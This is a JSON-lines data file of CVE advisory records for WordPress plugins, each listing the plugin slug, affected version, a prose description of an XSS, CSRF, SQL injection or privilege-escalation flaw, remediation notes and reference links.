{"CVE_ID":"CVE-2024-11445","slug":"image-magnify","versionImpact":"1.1","description":"The Image Magnify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'image_magnify' shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-magnify\\\/trunk\\\/image-magnify.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-magnify\\\/trunk\\\/image-magnify.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-magnify\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-magnify\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55838de5-0795-429b-be87-a0d57b29e471?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55838de5-0795-429b-be87-a0d57b29e471?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13433","slug":"utilities-for-mtg","versionImpact":"1.4.1","description":"The Utilities for MTG plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mtglink' shortcode in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/utilities-for-mtg\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/utilities-for-mtg\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe82b7ee-d09b-4eeb-a7d6-914b8b24368b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe82b7ee-d09b-4eeb-a7d6-914b8b24368b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13674","slug":"cosmic-blocks","versionImpact":"1.3.0","description":"The Cosmic Blocks (40+) Content Editor Blocks Collection plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cwp_social_share' shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cosmic-blocks\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cosmic-blocks\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cccd266-48a8-481e-8fbd-db5a9a72f55a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cccd266-48a8-481e-8fbd-db5a9a72f55a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13569","slug":"front-end-only-users","versionImpact":"3.2.32","description":"The Front End Users WordPress plugin through 3.2.32 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9742440-0e36-4900-b58e-41c9854a62b2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9742440-0e36-4900-b58e-41c9854a62b2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4103","slug":"wp-geometa","description":"The WP-GeoMeta plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the wp_ajax_wpgm_start_geojson_import() function in versions 0.3.4 to 0.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-geometa\\\/tags\\\/0.3.4\\\/lib\\\/wp-geometa-dash.php#L896\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-geometa\\\/tags\\\/0.3.4\\\/lib\\\/wp-geometa-dash.php#L896\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-geometa\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-geometa\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43039f2a-b3f9-4836-8b55-e8a091b1a102?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43039f2a-b3f9-4836-8b55-e8a091b1a102?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5933","slug":"rd-wapp","versionImpact":"1.4","description":"The RD Contacto plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the rdWappUpdateData() function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rd-wapp\\\/trunk\\\/includes\\\/rdwapp-class.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rd-wapp\\\/trunk\\\/includes\\\/rdwapp-class.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/113b3093-18fe-40ae-85af-aae1945201db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/113b3093-18fe-40ae-85af-aae1945201db?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4938","slug":"wc-frontend-manager","versionImpact":"6.6.0","description":"The WCFM Frontend Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 6.6.0 due to missing nonce checks on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of actions such as modifying knowledge bases, modifying notices, modifying payments, managing vendors, capabilities, and so much more, via a forged request granted they can trick a site's administrator into performing an action such as clicking on a link. There were hundreds of AJAX endpoints affected.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632630%40wc-frontend-manager&new=2632630%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632630%40wc-frontend-manager&new=2632630%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/798b57ad-0922-435c-8b4d-8a96b388b314?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/798b57ad-0922-435c-8b4d-8a96b388b314?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0621","slug":"simple-share-buttons-adder","versionImpact":"8.4.11","description":"The Simple Share Buttons Adder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 8.4.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93ab9f1a-26ce-466a-a5d3-d2046ec8f94d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93ab9f1a-26ce-466a-a5d3-d2046ec8f94d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032350%40simple-share-buttons-adder&new=3032350%40simple-share-buttons-adder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032350%40simple-share-buttons-adder&new=3032350%40simple-share-buttons-adder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032350\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032350\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9156","slug":"ti-woocommerce-wishlist","versionImpact":"2.9.0","description":"The TI WooCommerce Wishlist WordPress plugin through 2.8.2 is vulnerable to SQL Injection due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95974f9-1f68-4181-89b0-3559d61cfa93\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95974f9-1f68-4181-89b0-3559d61cfa93\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10342","slug":"league-of-legends-shortcodes","versionImpact":"1.0.1","description":"The League of Legends Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45e96aa3-97bb-4774-a1b5-5f0a7b18293e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45e96aa3-97bb-4774-a1b5-5f0a7b18293e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/league-of-legends-shortcodes\\\/trunk\\\/lol-shortcodes.php?rev=934346#L67\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/league-of-legends-shortcodes\\\/trunk\\\/lol-shortcodes.php?rev=934346#L67\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10884","slug":"simpleform-contact-form-submissions","versionImpact":"2.1.0","description":"The SimpleForm Contact Form Submissions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07f25481-51c1-4d02-85c6-561bee587587?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07f25481-51c1-4d02-85c6-561bee587587?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleform-contact-form-submissions\\\/tags\\\/2.1.0\\\/admin\\\/includes\\\/class-simpleform-entries-list.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleform-contact-form-submissions\\\/tags\\\/2.1.0\\\/admin\\\/includes\\\/class-simpleform-entries-list.php#L102\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11751","slug":"tcbd-popover","versionImpact":"1.2","description":"The TCBD Popover plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tcbd-popover-image ' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b08f533-9c74-4be3-99ff-70a3d9b90358?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b08f533-9c74-4be3-99ff-70a3d9b90358?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11434","slug":"wp-bulk-sms","versionImpact":"1.0.12","description":"The WP \u2013 Bulk SMS \u2013 by SMS.to plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bulk-sms\\\/trunk\\\/includes\\\/admin\\\/outbox\\\/class-wpsmstobulk-outbox.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bulk-sms\\\/trunk\\\/includes\\\/admin\\\/outbox\\\/class-wpsmstobulk-outbox.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17acbf24-b0ae-42c8-af8f-17e82213507d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17acbf24-b0ae-42c8-af8f-17e82213507d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13663","slug":"coaching-staffs","versionImpact":"1.4","description":"The Coaching Staffs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mstw-cs-table' shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coaching-staffs\\\/trunk\\\/mstw-coaching-staffs.php#L561\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coaching-staffs\\\/trunk\\\/mstw-coaching-staffs.php#L561\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06982502-6055-4a79-93ef-4896ba086322?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06982502-6055-4a79-93ef-4896ba086322?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12460","slug":"years-since","versionImpact":"1.4.1","description":"The Years Since \u2013 Timeless Texts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'years-since' shortcode in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/years-since\\\/trunk\\\/alar-years-since.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/years-since\\\/trunk\\\/alar-years-since.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/years-since\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/years-since\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f1cb71a-aabb-4ba1-93b4-24070aaa582b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f1cb71a-aabb-4ba1-93b4-24070aaa582b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5924","slug":"wp-push-notification-firebase","versionImpact":"1.2.0","description":"The WP Firebase Push Notification plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.0. This is due to missing or incorrect nonce validation on the wfpn_brodcast_notification_message() function. This makes it possible for unauthenticated attackers to send broadcast notifications via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-push-notification-firebase\\\/trunk\\\/wp_push_notification_firebase.php#L67\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-push-notification-firebase\\\/trunk\\\/wp_push_notification_firebase.php#L67\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996e0432-e795-4c01-8182-603a47f4f341?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996e0432-e795-4c01-8182-603a47f4f341?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6754","slug":"seo-metrics-helper","versionImpact":"1.0.15","description":"The SEO Metrics plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization checks in both the seo_metrics_handle_connect_button_click() AJAX handler and the seo_metrics_handle_custom_endpoint() function in versions 1.0.5 through 1.0.15. Because the AJAX action only verifies a nonce, without checking the caller\u2019s capabilities, a subscriber-level user can retrieve the token and then access the custom endpoint to obtain full administrator cookies.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/common-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/common-functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/endpoint.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/endpoint.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/seo-metrics.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/seo-metrics.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/welcome-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/welcome-page.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-metrics-helper\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-metrics-helper\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48658b33-ae53-4919-8180-1188f72553f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48658b33-ae53-4919-8180-1188f72553f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4937","slug":"wc-frontend-manager","versionImpact":"6.6.0","description":"The WCFM Frontend Manager plugin for WordPress is vulnerable to unauthorized modification and access of data in versions up to, and including, 6.6.0 due to missing capability checks on various AJAX actions. This makes it possible for authenticated attackers, with minimal permissions such as subscribers, to perform a wide variety of actions such as modifying knowledge bases, modifying notices, modifying payments, managing vendors, capabilities, and so much more. There were hundreds of AJAX endpoints affected.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2630745%40wc-frontend-manager&new=2630745%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2630745%40wc-frontend-manager&new=2630745%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2629284%40wc-frontend-manager&new=2629284%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2629284%40wc-frontend-manager&new=2629284%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632630%40wc-frontend-manager&new=2632630%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632630%40wc-frontend-manager&new=2632630%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d946d4b5-bed7-4808-b133-783b2dcd7992?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d946d4b5-bed7-4808-b133-783b2dcd7992?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2633187%40wc-frontend-manager&new=2633187%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2633187%40wc-frontend-manager&new=2633187%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2634199%40wc-frontend-manager&new=2634199%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2634199%40wc-frontend-manager&new=2634199%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2405","slug":"crm-customer-relationship-management-by-vcita","versionImpact":"2.6.2","description":"The CRM and Lead Management by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.6.2. This is due to missing nonce validation in the vcita-callback.php file. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f75c6bf-1b93-49d5-b5fb-e59b4e67432f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f75c6bf-1b93-49d5-b5fb-e59b4e67432f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-callback.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-callback.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6801","slug":"feedzy-rss-feeds","versionImpact":"4.3.2","description":"The RSS Aggregator by Feedzy \u2013 Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a713d897-c549-4e0d-9cb3-7002ef2b127f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a713d897-c549-4e0d-9cb3-7002ef2b127f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012392%40feedzy-rss-feeds%2Ftrunk&old=2991547%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012392%40feedzy-rss-feeds%2Ftrunk&old=2991547%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
